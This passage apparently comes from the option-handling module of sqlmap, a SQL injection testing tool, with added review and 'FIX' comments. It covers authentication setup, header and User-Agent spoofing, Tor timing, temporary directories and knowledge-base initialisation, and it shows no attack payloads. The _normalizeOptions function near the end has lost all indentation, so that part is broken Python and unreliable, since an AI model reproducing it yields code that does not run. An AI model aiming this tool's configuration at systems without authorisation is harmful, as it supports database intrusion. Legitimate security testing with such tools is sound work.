        # Plain --safe-url: prepend a scheme when missing
        if not re.search(r"\Ahttp[s]*://", conf.safeUrl):
            if ":443/" in conf.safeUrl:
                conf.safeUrl = "https://" + conf.safeUrl
            else:
                conf.safeUrl = "http://" + conf.safeUrl

    if conf.safeFreq <= 0:
        errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe visit features"
        raise SqlmapSyntaxException(errMsg)
def _setPrefixSuffix():
    # Builds a single payload boundary from user-supplied --prefix/--suffix;
    # both options must be present for it to take effect
    if conf.prefix is not None and conf.suffix is not None:
        # Create a custom boundary object for user's supplied prefix
        # and suffix
        boundary = AttribDict()

        boundary.level = 1
        boundary.clause = [0]
        boundary.where = [1, 2, 3]
        boundary.prefix = conf.prefix
        boundary.suffix = conf.suffix

        # Infer the boundary parameter type from quoting style in the suffix
        if " like" in boundary.suffix.lower():
            if "'" in boundary.suffix.lower():
                boundary.ptype = 3
            elif '"' in boundary.suffix.lower():
                boundary.ptype = 5
            # NOTE(review): a LIKE suffix containing neither quote character
            # leaves boundary.ptype unset -- confirm this is intended
        elif "'" in boundary.suffix:
            boundary.ptype = 2
        elif '"' in boundary.suffix:
            boundary.ptype = 4
        else:
            boundary.ptype = 1

        # user who provides --prefix/--suffix does not want other boundaries
        # to be tested for
        conf.boundaries = [boundary]
def _setAuthCred():
    """
    Adds authentication credentials (if any) for current target to the password manager
    (used by connection handler)
    """
    required = (conf.scheme, conf.hostname, conf.port, conf.authUsername, conf.authPassword)

    # Register only when the password manager exists and every component
    # of the target/credential tuple is known
    if kb.passwordMgr and not any(_ is None for _ in required):
        targetUrl = "%s://%s:%d" % (conf.scheme, conf.hostname, conf.port)
        kb.passwordMgr.add_password(None, targetUrl, conf.authUsername, conf.authPassword)
def _setHTTPAuthentication():
    """
    Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or PKI),
    username and password for first three methods, or PEM private key file for
    PKI authentication
    """
    global authHandler

    if not conf.authType and not conf.authCred and not conf.authFile:
        return

    # A key file alone implies PKI authentication
    if conf.authFile and not conf.authType:
        conf.authType = AUTH_TYPE.PKI
    elif conf.authType and not conf.authCred and not conf.authFile:
        errMsg = "you specified the HTTP authentication type, but "
        errMsg += "did not provide the credentials"
        raise SqlmapSyntaxException(errMsg)
    elif not conf.authType and conf.authCred:
        errMsg = "you specified the HTTP authentication credentials, "
        errMsg += "but did not provide the type"
        raise SqlmapSyntaxException(errMsg)
    elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):
        errMsg = "HTTP authentication type value must be "
        errMsg += "Basic, Digest, NTLM or PKI"
        raise SqlmapSyntaxException(errMsg)

    if not conf.authFile:
        debugMsg = "setting the HTTP authentication type and credentials"
        logger.debug(debugMsg)

        authType = conf.authType.lower()

        # Pick the credential pattern per type; errMsg doubles as the
        # failure message for the regex match below
        if authType in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST):
            regExp = "^(.*?):(.*?)$"
            errMsg = "HTTP %s authentication credentials " % authType
            errMsg += "value must be in format 'username:password'"
        elif authType == AUTH_TYPE.NTLM:
            regExp = "^(.*\\\\.*):(.*?)$"
            errMsg = "HTTP NTLM authentication credentials value must "
            errMsg += "be in format 'DOMAIN\\username:password'"
        elif authType == AUTH_TYPE.PKI:
            errMsg = "HTTP PKI authentication require "
            errMsg += "usage of option `--auth-pki`"
            raise SqlmapSyntaxException(errMsg)

        aCredRegExp = re.search(regExp, conf.authCred)

        if not aCredRegExp:
            raise SqlmapSyntaxException(errMsg)

        conf.authUsername = aCredRegExp.group(1)
        conf.authPassword = aCredRegExp.group(2)

        kb.passwordMgr = urllib2.HTTPPasswordMgrWithDefaultRealm()

        _setAuthCred()

        if authType == AUTH_TYPE.BASIC:
            authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr)
        elif authType == AUTH_TYPE.DIGEST:
            authHandler = urllib2.HTTPDigestAuthHandler(kb.passwordMgr)
        elif authType == AUTH_TYPE.NTLM:
            try:
                from ntlm import HTTPNtlmAuthHandler
            except ImportError:
                errMsg = "sqlmap requires Python NTLM third-party library "
                errMsg += "in order to authenticate via NTLM, "
                errMsg += "https://github.com/mullender/python-ntlm"
                raise SqlmapMissingDependence(errMsg)

            authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr)
    else:
        # PKI: authenticate with a PEM private key file instead of credentials
        debugMsg = "setting the HTTP(s) authentication PEM private key"
        logger.debug(debugMsg)

        _ = safeExpandUser(conf.authFile)
        checkFile(_)
        authHandler = HTTPSPKIAuthHandler(_)
def _setHTTPExtraHeaders():
    """
    Parses user-supplied extra HTTP headers, or appends sane defaults
    when none were given
    """
    if conf.headers:
        debugMsg = "setting extra HTTP headers"
        logger.debug(debugMsg)

        # Accept both real newlines and literal "\n" sequences as separators
        separator = "\n" if "\n" in conf.headers else "\\n"
        conf.headers = conf.headers.split(separator)

        for headerValue in conf.headers:
            if not headerValue.strip():
                continue

            if headerValue.count(':') == 0:
                errMsg = "invalid header value: %s. Valid header format is 'name:value'" % repr(headerValue).lstrip('u')
                raise SqlmapSyntaxException(errMsg)

            name, value = (part.lstrip() for part in headerValue.split(":", 1))
            # entries with an empty name or value are silently skipped
            if name and value:
                conf.httpHeaders.append((name, value))

    elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
        if conf.encoding:
            conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.encoding))

        # Invalidating any caching mechanism in between
        # Reference: http://stackoverflow.com/a/1383359
        conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache"))
def _setHTTPUserAgent():
    """
    Set the HTTP User-Agent header.
    Depending on the user options it can be:

        * The default sqlmap string
        * A default value read as user option
        * A random value read from a list of User-Agent headers from a
          file choosed as user option
    """
    if conf.mobile:
        # Let the user pick a smartphone User-Agent to imitate
        message = "which smartphone do you want sqlmap to imitate "
        message += "through HTTP User-Agent header?\n"
        items = sorted(getPublicTypeMembers(MOBILES, True))

        for count in xrange(len(items)):
            item = items[count]
            message += "[%d] %s%s\n" % (count + 1, item[0], " (default)" if item == MOBILES.IPHONE else "")

        test = readInput(message.rstrip('\n'), default=items.index(MOBILES.IPHONE) + 1)

        try:
            item = items[int(test) - 1]
        except:
            # any invalid answer falls back to the default device
            item = MOBILES.IPHONE

        conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, item[1]))
    elif conf.agent:
        debugMsg = "setting the HTTP User-Agent header"
        logger.debug(debugMsg)

        conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, conf.agent))
    elif not conf.randomAgent:
        # FIX: the original loop reused '_' both as the "missing UA" flag and
        # as the loop target ("for header, _ in ..."), so the flag ended up
        # holding the last header's value; a falsy last value could wrongly
        # suppress adding the default User-Agent
        present = any(header.upper() == HTTP_HEADER.USER_AGENT.upper() for header, _ in conf.httpHeaders)

        if not present:
            conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, DEFAULT_USER_AGENT))
    else:
        # Random agent: lazily load the bundled User-Agent list once
        if not kb.userAgents:
            debugMsg = "loading random HTTP User-Agent header(s) from "
            debugMsg += "file '%s'" % paths.USER_AGENTS
            logger.debug(debugMsg)

            try:
                kb.userAgents = getFileItems(paths.USER_AGENTS)
            except IOError:
                warnMsg = "unable to read HTTP User-Agent header "
                warnMsg += "file '%s'" % paths.USER_AGENTS
                logger.warn(warnMsg)

                conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, DEFAULT_USER_AGENT))
                return

        userAgent = random.sample(kb.userAgents or [DEFAULT_USER_AGENT], 1)[0]

        infoMsg = "fetched random HTTP User-Agent header value '%s' from " % userAgent
        infoMsg += "file '%s'" % paths.USER_AGENTS
        logger.info(infoMsg)

        conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent))
def _setHTTPReferer():
    """
    Set the HTTP Referer
    """
    if not conf.referer:
        return

    debugMsg = "setting the HTTP Referer header"
    logger.debug(debugMsg)

    conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer))
def _setHTTPHost():
    """
    Set the HTTP Host
    """
    if not conf.host:
        return

    debugMsg = "setting the HTTP Host header"
    logger.debug(debugMsg)

    conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host))
def _setHTTPCookies():
    """
    Set the HTTP Cookie header
    """
    if not conf.cookie:
        return

    debugMsg = "setting the HTTP Cookie header"
    logger.debug(debugMsg)

    conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie))
def _setHostname():
    """
    Set value conf.hostname
    """
    if not conf.url:
        return

    try:
        # Strip any ":port" suffix from the network location part
        netloc = urlparse.urlsplit(conf.url).netloc
        conf.hostname = netloc.split(':')[0]
    except ValueError as ex:
        errMsg = "problem occurred while "
        errMsg += "parsing an URL '%s' ('%s')" % (conf.url, getSafeExString(ex))
        raise SqlmapDataException(errMsg)
def _setHTTPTimeout():
    """
    Set the HTTP timeout

    Normalizes conf.timeout to a float (default 30 seconds, clamped to a
    minimum of 3 seconds) and applies it as the global socket default.
    """
    if conf.timeout:
        debugMsg = "setting the HTTP timeout"
        logger.debug(debugMsg)

        conf.timeout = float(conf.timeout)

        if conf.timeout < 3.0:
            # FIX: reworded formerly broken warning text
            # ("sqlmap will going to reset it")
            warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap "
            warnMsg += "is going to reset it"
            logger.warn(warnMsg)

            conf.timeout = 3.0
    else:
        conf.timeout = 30.0

    socket.setdefaulttimeout(conf.timeout)
def _checkDependencies():
    """
    Checks for missing dependencies.
    """
    if not conf.dependencies:
        return

    checkDependencies()
def _createTemporaryDirectory():
    """
    Creates temporary directory for this run.
    """
    if conf.tmpDir:
        try:
            if not os.path.isdir(conf.tmpDir):
                os.makedirs(conf.tmpDir)

            # Probe writability with a throwaway file before committing
            _ = os.path.join(conf.tmpDir, randomStr())

            open(_, "w+b").close()
            os.remove(_)

            tempfile.tempdir = conf.tmpDir

            warnMsg = "using '%s' as the temporary directory" % conf.tmpDir
            logger.warn(warnMsg)
        except (OSError, IOError) as ex:
            errMsg = "there has been a problem while accessing "
            errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex)
            raise SqlmapSystemException(errMsg)
    else:
        try:
            if not os.path.isdir(tempfile.gettempdir()):
                os.makedirs(tempfile.gettempdir())
        except Exception as ex:
            warnMsg = "there has been a problem while accessing "
            warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
            warnMsg += "make sure that there is enough disk space left. If problem persists, "
            warnMsg += "try to set environment variable 'TEMP' to a location "
            warnMsg += "writeable by the current user"
            logger.warn(warnMsg)

    # Create a run-specific subdirectory unless one was already set up.
    # NOTE(review): 'and' binds tighter than 'or' here, i.e. the condition is
    # (no "sqlmap" in tempdir) or (tmpDir given and tempdir == tmpDir) --
    # confirm this precedence is intended
    if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:
        try:
            tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
        except:
            # fall back to a directory under sqlmap's home path
            tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid()))

    kb.tempDir = tempfile.tempdir

    if not os.path.isdir(tempfile.tempdir):
        try:
            os.makedirs(tempfile.tempdir)
        except Exception as ex:
            errMsg = "there has been a problem while setting "
            errMsg += "temporary directory location ('%s')" % getSafeExString(ex)
            raise SqlmapSystemException(errMsg)
def _cleanupOptions():
    """
    Cleanup configuration attributes.

    Normalizes user-supplied option values (splitting lists, expanding
    paths, fixing schemes/casing, decoding escapes) before the run starts.
    """
    debugMsg = "cleaning up configuration parameters"
    logger.debug(debugMsg)

    width = getConsoleWidth()

    # ETA output needs more room on the console line
    if conf.eta:
        conf.progressWidth = width - 26
    else:
        conf.progressWidth = width - 46

    # Expand "~" in every path-like option value
    for key, value in conf.items():
        if value and any(key.endswith(_) for _ in ("Path", "File", "Dir")):
            conf[key] = safeExpandUser(value)

    if conf.testParameter:
        conf.testParameter = urldecode(conf.testParameter)
        conf.testParameter = conf.testParameter.replace(" ", "")
        conf.testParameter = re.split(PARAMETER_SPLITTING_REGEX, conf.testParameter)
    else:
        conf.testParameter = []

    if conf.agent:
        conf.agent = re.sub(r"[\r\n]", "", conf.agent)

    if conf.user:
        conf.user = conf.user.replace(" ", "")

    if conf.rParam:
        conf.rParam = conf.rParam.replace(" ", "")
        conf.rParam = re.split(PARAMETER_SPLITTING_REGEX, conf.rParam)
    else:
        conf.rParam = []

    # NOTE: "string_escape" codec is Python 2 only
    if conf.paramDel and '\\' in conf.paramDel:
        try:
            conf.paramDel = conf.paramDel.decode("string_escape")
        except ValueError:
            pass

    if conf.skip:
        conf.skip = conf.skip.replace(" ", "")
        conf.skip = re.split(PARAMETER_SPLITTING_REGEX, conf.skip)
    else:
        conf.skip = []

    if conf.cookie:
        conf.cookie = re.sub(r"[\r\n]", "", conf.cookie)

    if conf.delay:
        conf.delay = float(conf.delay)

    if conf.url:
        conf.url = conf.url.strip()
        # default to http:// when no scheme was provided
        if not re.search(r"\A\w+://", conf.url):
            conf.url = "http://%s" % conf.url

    if conf.fileRead:
        conf.fileRead = ntToPosixSlashes(normalizePath(conf.fileRead))

    if conf.fileWrite:
        conf.fileWrite = ntToPosixSlashes(normalizePath(conf.fileWrite))

    if conf.fileDest:
        conf.fileDest = ntToPosixSlashes(normalizePath(conf.fileDest))

    if conf.sitemapUrl and not conf.sitemapUrl.lower().startswith("http"):
        conf.sitemapUrl = "http%s://%s" % ('s' if conf.forceSSL else '', conf.sitemapUrl)

    if conf.msfPath:
        conf.msfPath = ntToPosixSlashes(normalizePath(conf.msfPath))

    if conf.tmpPath:
        conf.tmpPath = ntToPosixSlashes(normalizePath(conf.tmpPath))

    # Any multi-target source implies multiple-target mode
    if any((conf.googleDork, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.forms, conf.crawlDepth)):
        conf.multipleTargets = True

    if conf.optimize:
        setOptimize()

    if conf.os:
        conf.os = conf.os.capitalize()

    if conf.forceDbms:
        conf.dbms = conf.forceDbms

    if conf.dbms:
        # Resolve DBMS aliases into the filter list; keep a single conf.dbms
        # only when exactly one value was supplied
        kb.dbmsFilter = []

        for _ in conf.dbms.split(','):
            for dbms, aliases in DBMS_ALIASES:
                if _.strip().lower() in aliases:
                    kb.dbmsFilter.append(dbms)
                    conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None
                    break

    if conf.testFilter:
        conf.testFilter = conf.testFilter.strip('*+')
        conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter)

        try:
            re.compile(conf.testFilter)
        except re.error:
            conf.testFilter = re.escape(conf.testFilter)

    if conf.csrfToken:
        original = conf.csrfToken
        try:
            re.compile(conf.csrfToken)

            # Ask whether a regex-looking token should stay a regex
            if re.escape(conf.csrfToken) != conf.csrfToken:
                message = "provided value for option '--csrf-token' is a regular expression? [Y/n] "
                if not readInput(message, default='Y', boolean=True):
                    conf.csrfToken = re.escape(conf.csrfToken)
        except re.error:
            conf.csrfToken = re.escape(conf.csrfToken)
        finally:
            # Wrap in a unicode subclass so the pre-escape value can be
            # retained on the instance
            class _(unicode):
                pass
            conf.csrfToken = _(conf.csrfToken)
            conf.csrfToken._original = original

    if conf.testSkip:
        conf.testSkip = conf.testSkip.strip('*+')
        conf.testSkip = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testSkip)

        try:
            re.compile(conf.testSkip)
        except re.error:
            conf.testSkip = re.escape(conf.testSkip)

    # Honor an explicit --time-sec; otherwise double it when Tor is used
    if "timeSec" not in kb.explicitSettings:
        if conf.tor:
            conf.timeSec = 2 * conf.timeSec
            kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE

            warnMsg = "increasing default value for "
            warnMsg += "option '--time-sec' to %d because " % conf.timeSec
            warnMsg += "switch '--tor' was provided"
            logger.warn(warnMsg)
    else:
        kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE

    if conf.retries:
        conf.retries = min(conf.retries, MAX_CONNECT_RETRIES)

    if conf.code:
        conf.code = int(conf.code)

    if conf.csvDel:
        conf.csvDel = conf.csvDel.decode("string_escape")  # e.g. '\\t' -> '\t'

    if conf.torPort and isinstance(conf.torPort, basestring) and conf.torPort.isdigit():
        conf.torPort = int(conf.torPort)

    if conf.torType:
        conf.torType = conf.torType.upper()

    if conf.outputDir:
        paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir))
        setPaths(paths.SQLMAP_ROOT_PATH)

    if conf.string:
        try:
            conf.string = conf.string.decode("unicode_escape")
        except:
            # manual fallback: translate escaped whitespace sequences
            charset = string.whitespace.replace(" ", "")
            for _ in charset:
                conf.string = conf.string.replace(_.encode("string_escape"), _)

    if conf.getAll:
        map(lambda _: conf.__setitem__(_, True), WIZARD.ALL)

    if conf.noCast:
        for _ in list(DUMP_REPLACEMENTS.keys()):
            del DUMP_REPLACEMENTS[_]

    if conf.dumpFormat:
        conf.dumpFormat = conf.dumpFormat.upper()

    # NOTE(review): duplicate of the conf.torType normalization above -
    # harmless (idempotent), candidate for removal
    if conf.torType:
        conf.torType = conf.torType.upper()

    if conf.col:
        conf.col = re.sub(r"\s*,\s*", ',', conf.col)

    if conf.exclude:
        conf.exclude = re.sub(r"\s*,\s*", ',', conf.exclude)

    if conf.binaryFields:
        conf.binaryFields = re.sub(r"\s*,\s*", ',', conf.binaryFields)

    # Pre-connect mechanism is incompatible with proxied traffic
    if any((conf.proxy, conf.proxyFile, conf.tor)):
        conf.disablePrecon = True

    if conf.dummy:
        conf.batch = True

    threadData = getCurrentThreadData()
    threadData.reset()
def _cleanupEnvironment():
    """
    Cleanup environment (e.g. from leftovers after --sqlmap-shell).
    """
    # Discard any leftover pre-connected sockets from a previous run
    if hasattr(socket, "_ready"):
        socket._ready.clear()

    # Undo SOCKS wrapping of urllib2's socket layer if it is still in place
    if issubclass(urllib2.socket.socket, socks.socksocket):
        socks.unwrapmodule(urllib2)
def _purge():
    """
    Safely removes (purges) sqlmap data directory.
    """
    if not conf.purge:
        return

    purge(paths.SQLMAP_HOME_PATH)
def _setConfAttributes():
    """
    This function set some needed attributes into the configuration
    singleton.
    """
    debugMsg = "initializing the configuration"
    logger.debug(debugMsg)

    # Authentication credentials (filled by _setHTTPAuthentication)
    conf.authUsername = None
    conf.authPassword = None
    # Payload boundaries (possibly overridden by _setPrefixSuffix)
    conf.boundaries = []
    # Cookie jar used by the HTTP opener
    conf.cj = None
    conf.dbmsConnector = None
    conf.dbmsHandler = None
    conf.dnsServer = None
    conf.dumpPath = None
    conf.hashDB = None
    conf.hashDBFile = None
    conf.httpCollector = None
    # Accumulated (name, value) header pairs for outgoing requests
    conf.httpHeaders = []
    conf.hostname = None
    conf.ipv6 = False
    conf.multipleTargets = False
    conf.outputPath = None
    conf.paramDict = {}
    conf.parameters = {}
    conf.path = None
    conf.port = None
    conf.proxyList = None
    conf.resultsFilename = None
    conf.resultsFP = None
    conf.scheme = None
    conf.tests = []
    conf.trafficFP = None
    conf.HARCollectorFactory = None
    conf.fileWriteType = None
def _setKnowledgeBaseAttributes(flushAll=True):
    """
    This function set some needed attributes into the knowledge base
    singleton.

    :param flushAll: when True also resets cross-target state (tamper
                     functions, targets, tested parameters, etc.)
    """
    debugMsg = "initializing the knowledge base"
    logger.debug(debugMsg)

    kb.absFilePaths = set()
    kb.adjustTimeDelay = None
    kb.alerted = False
    kb.aliasName = randomStr()
    kb.alwaysRefresh = None
    kb.arch = None
    kb.authHeader = None
    kb.bannerFp = AttribDict()
    kb.binaryField = False
    kb.browserVerification = None

    kb.brute = AttribDict({"tables": [], "columns": []})
    kb.bruteMode = False

    # Per-run caches (DNS, page content, encodings, regexes, ...)
    kb.cache = AttribDict()
    kb.cache.addrinfo = {}
    kb.cache.content = {}
    kb.cache.encoding = {}
    kb.cache.alphaBoundaries = None
    kb.cache.intBoundaries = None
    kb.cache.parsedDbms = {}
    kb.cache.regex = {}
    kb.cache.stdev = {}

    kb.captchaDetected = None

    # Randomized marker characters used inside payloads/answers
    kb.chars = AttribDict()
    kb.chars.delimiter = randomStr(length=6, lowercase=True)
    kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
    kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
    kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))

    kb.columnExistsChoice = None
    kb.commonOutputs = None
    kb.connErrorChoice = None
    kb.connErrorCounter = 0
    kb.cookieEncodeChoice = None
    kb.counters = {}
    kb.customInjectionMark = CUSTOM_INJECTION_MARK_CHAR
    kb.data = AttribDict()
    kb.dataOutputFlag = False

    # Active back-end DBMS fingerprint
    kb.dbms = None
    kb.dbmsFilter = []
    kb.dbmsVersion = [UNKNOWN_DBMS_VERSION]

    kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]
    kb.dep = None
    kb.dnsMode = False
    kb.dnsTest = None
    kb.docRoot = None
    kb.droppingRequests = False
    kb.dumpColumns = None
    kb.dumpTable = None
    kb.dumpKeyboardInterrupt = False
    kb.dynamicMarkings = []
    kb.dynamicParameter = False
    kb.endDetection = False
    kb.explicitSettings = set()
    kb.extendTests = None
    kb.errorChunkLength = None
    kb.errorIsNone = True
    kb.falsePositives = []
    kb.fileReadMode = False
    kb.followSitemapRecursion = None
    kb.forcedDbms = None
    kb.forcePartialUnion = False
    kb.forceWhere = None
    kb.futileUnion = None
    kb.heavilyDynamic = False
    kb.headersFp = {}
    kb.heuristicDbms = None
    kb.heuristicExtendedDbms = None
    kb.heuristicMode = False
    kb.heuristicPage = False
    kb.heuristicTest = None
    kb.hintValue = None
    kb.htmlFp = []
    kb.httpErrorCodes = {}
    kb.inferenceMode = False
    kb.ignoreCasted = None
    kb.ignoreNotFound = False
    kb.ignoreTimeout = False
    kb.injection = InjectionDict()
    kb.injections = []
    kb.laggingChecked = False
    kb.lastParserStatus = None

    # One lock per shared subsystem used by worker threads
    kb.locks = AttribDict()
    for _ in ("cache", "connError", "count", "index", "io", "limit", "log", "socket", "redirect", "request", "value"):
        kb.locks[_] = threading.Lock()

    kb.matchRatio = None
    kb.maxConnectionsFlag = False
    kb.mergeCookies = None
    kb.negativeLogic = False
    kb.nullConnection = None
    kb.oldMsf = None
    kb.orderByColumns = None
    kb.originalCode = None
    kb.originalPage = None
    kb.originalPageTime = None
    kb.originalTimeDelay = None
    kb.originalUrls = dict()

    # Back-end DBMS underlying operating system fingerprint via banner (-b)
    # parsing
    kb.os = None
    kb.osVersion = None
    kb.osSP = None

    kb.pageCompress = True
    kb.pageTemplate = None
    kb.pageTemplates = dict()
    kb.pageEncoding = DEFAULT_PAGE_ENCODING
    kb.pageStable = None
    kb.partRun = None
    kb.permissionFlag = False
    kb.postHint = None
    kb.postSpaceToPlus = False
    kb.postUrlEncode = True
    kb.prependFlag = False
    kb.processResponseCounter = 0
    kb.previousMethod = None
    kb.processUserMarks = None
    kb.proxyAuthHeader = None
    kb.queryCounter = 0
    kb.redirectChoice = None
    kb.reflectiveMechanism = True
    kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0}
    kb.requestCounter = 0
    kb.resendPostOnRedirect = None
    kb.resolutionDbms = None
    kb.responseTimes = {}
    kb.responseTimeMode = None
    kb.responseTimePayload = None
    kb.resumeValues = True
    kb.rowXmlMode = False
    kb.safeCharEncode = False
    kb.safeReq = AttribDict()
    kb.secondReq = None
    kb.serverHeader = None
    kb.singleLogFlags = set()
    kb.skipSeqMatcher = False
    kb.reduceTests = None
    kb.tlsSNI = {}
    kb.stickyDBMS = False
    kb.stickyLevel = None
    kb.storeCrawlingChoice = None
    kb.storeHashesChoice = None
    kb.suppressResumeInfo = False
    kb.tableFrom = None
    kb.technique = None
    kb.tempDir = None
    kb.testMode = False
    kb.testOnlyCustom = False
    kb.testQueryCount = 0
    kb.testType = None
    kb.threadContinue = True
    kb.threadException = False
    kb.tableExistsChoice = None
    kb.uChar = NULL
    kb.unionDuplicates = False
    kb.wafSpecificResponse = None
    kb.wizardMode = False
    kb.xpCmdshellAvailable = False

    # State that survives per-target re-initialization unless a full
    # flush was requested
    if flushAll:
        kb.headerPaths = {}
        kb.keywords = set(getFileItems(paths.SQL_KEYWORDS))
        kb.passwordMgr = None
        kb.skipVulnHost = None
        kb.tamperFunctions = []
        kb.targets = oset()
        kb.testedParams = set()
        kb.userAgents = None
        kb.vainRun = True
        kb.vulnHosts = set()
        kb.wafFunctions = []
        kb.wordlists = None
def _useWizardInterface():
    """
    Presents simple wizard interface for beginner users
    """
    if not conf.wizard:
        return

    logger.info("starting wizard interface")

    while not conf.url:
        message = "Please enter full target URL (-u): "
        conf.url = readInput(message, default=None)

    # FIX: both branches of the original conditional returned conf.method,
    # making it a no-op; the intent is to label GET requests with POST here
    message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST)
    conf.data = readInput(message, default=None)

    # FIX: explicit generator instead of filter(lambda ...) - same truth
    # value, and safe regardless of filter()'s laziness
    if not (any('=' in unicode(_) for _ in (conf.url, conf.data)) or '*' in conf.url):
        warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST)
        warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). "
        if not conf.crawlDepth and not conf.forms:
            warnMsg += "Will search for forms"
            conf.forms = True
        logger.warn(warnMsg)

    choice = None

    while choice is None or choice not in ("", "1", "2", "3"):
        message = "Injection difficulty (--level/--risk). Please choose:\n"
        message += "[1] Normal (default)\n[2] Medium\n[3] Hard"
        choice = readInput(message, default='1')

    if choice == '2':
        conf.risk = 2
        conf.level = 3
    elif choice == '3':
        conf.risk = 3
        conf.level = 5
    else:
        conf.risk = 1
        conf.level = 1

    if not conf.getAll:
        choice = None

        while choice is None or choice not in ("", "1", "2", "3"):
            message = "Enumeration (--banner/--current-user/etc). Please choose:\n"
            message += "[1] Basic (default)\n[2] Intermediate\n[3] All"
            choice = readInput(message, default='1')

        # FIX: explicit loop instead of map() with a side-effecting lambda
        # (a lazy map would silently skip the assignments)
        if choice == '2':
            options = WIZARD.INTERMEDIATE
        elif choice == '3':
            options = WIZARD.ALL
        else:
            options = WIZARD.BASIC

        for _ in options:
            conf[_] = True

    logger.debug("muting sqlmap.. it will do the magic for you")
    conf.verbose = 0

    conf.batch = True
    conf.threads = 4

    dataToStdout("\nsqlmap is running, please wait..\n\n")

    kb.wizardMode = True
def _saveConfig():
    """
    Dumps effective command line options into a sqlmap configuration
    (INI) file when option '--save' is used.
    """

    if not conf.saveConfig:
        return

    logger.debug("saving command line options to a sqlmap configuration INI file")

    saveConfig(conf, conf.saveConfig)

    logger.info("saved command line options to the configuration file '%s'" % conf.saveConfig)
def setVerbosity():
    """
    This function set the verbosity of sqlmap output messages.
    """

    # unset verbosity means the default level of 1
    conf.verbose = int(conf.verbose if conf.verbose is not None else 1)

    # ETA progress bar can't coexist with verbose traffic output
    if conf.verbose > 2 and conf.eta:
        conf.verbose = 2

    levels = {
        0: logging.ERROR,
        1: logging.INFO,
        2: logging.DEBUG,
        3: CUSTOM_LOGGING.PAYLOAD,
        4: CUSTOM_LOGGING.TRAFFIC_OUT,
    }

    if conf.verbose >= 5:
        logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN)
    elif conf.verbose in levels:
        logger.setLevel(levels[conf.verbose])
def _normalizeOptions(inputOptions):
"""
Sets proper option types
"""
types_ = {}
for group in optDict.keys():
types_.update(optDict[group])
for key in inputOptions:
if key in types_:
value = inputOptions[key]
if value is None:
continue
type_ = types_[key]
if type_ and isinstance(type_, tuple):
type_ = type_[0]
if type_ == OPTION_TYPE.BOOLEAN:
try:
value = bool(value)
except (TypeError, ValueError):
value = False
elif type_ == OPTION_TYPE.INTEGER:
try:
value = int(value)
except (TypeError, ValueError):
value = 0
elif type_ == OPTION_TYPE.FLOAT:
try:
value = float(value)
except (TypeError, ValueError):
value = 0.0
inputOptions[key] = value
def _mergeOptions(inputOptions, overrideOptions):
    """
    Merge command line options with configuration file and default options.

    @param inputOptions: optparse object with command line options.
    @type inputOptions: C{instance}
    """

    # options from the '-c' configuration file are applied first (lowest precedence)
    if inputOptions.configFile:
        configFileParser(inputOptions.configFile)

    # support both dict-like objects and plain optparse namespaces
    if hasattr(inputOptions, "items"):
        inputOptionsItems = inputOptions.items()
    else:
        inputOptionsItems = inputOptions.__dict__.items()

    # explicitly provided values win over existing conf entries
    for key, value in inputOptionsItems:
        if key not in conf or value not in (None, False) or overrideOptions:
            conf[key] = value

    # remember which options the user set explicitly (skipped in API mode)
    if not conf.api:
        for key, value in conf.items():
            if value is not None:
                kb.explicitSettings.add(key)

    # fill any remaining unset options with their documented defaults
    for key, value in defaults.items():
        if hasattr(conf, key) and conf[key] is None:
            conf[key] = value

    # build an UPPERCASE -> option-name lookup table used for
    # environment variables prefixed with SQLMAP_ENVIRONMENT_PREFIX
    lut = {}
    for group in optDict.keys():
